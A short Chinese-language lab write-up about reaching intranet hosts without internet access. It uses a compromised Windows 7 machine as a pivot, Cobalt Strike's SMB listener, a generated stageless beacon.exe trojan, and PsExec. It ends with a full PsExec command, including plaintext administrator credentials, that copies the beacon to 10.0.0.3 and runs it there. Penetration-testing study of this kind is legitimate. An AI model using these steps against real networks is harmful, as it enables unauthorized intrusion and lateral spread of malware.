实战中打入内网经常会碰到内网中存在不出网的主机。
实验
win7通外网也和域内不出网主机相通,域内不出网主机ip10.0.0.3
前提该出网主机已经被成功拿下。
利用这个机子作为中间人,创建一个listen,Name这里我设置为smb1。
选择 Attacks->Packages->Windows Executable(Stageless),生成exe、dll木马文件都可以
生成的beacon.exe木马文件。并将该木马文件上传至目标主机,这里我同时上传了PsExec.exe工具进行一个横向,因为实战中发现cs本身的横向工具不太给力。(在cs4.0中, 可以直接使用jump psexec命令)
利用psexec的远程上传并执行的功能(-d参数), 通过10.0.0.123主机横向获取10.0.0.3主机权限后利用smb445端口上线内网不出网主机。主要是通过出网机作为一个中间人,10.0.0.3主机成功上线后,通过端口连接可以看得出来。所有出网机一断开,不出网主机也会断。
shell C:\Users\AF.AUFENG\psexec -accepteula \\10.0.0.123,10.0.0.3 -u administrator -p Ojf123456789 -d -c C:\Users\AF.AUFENG\beacon.exe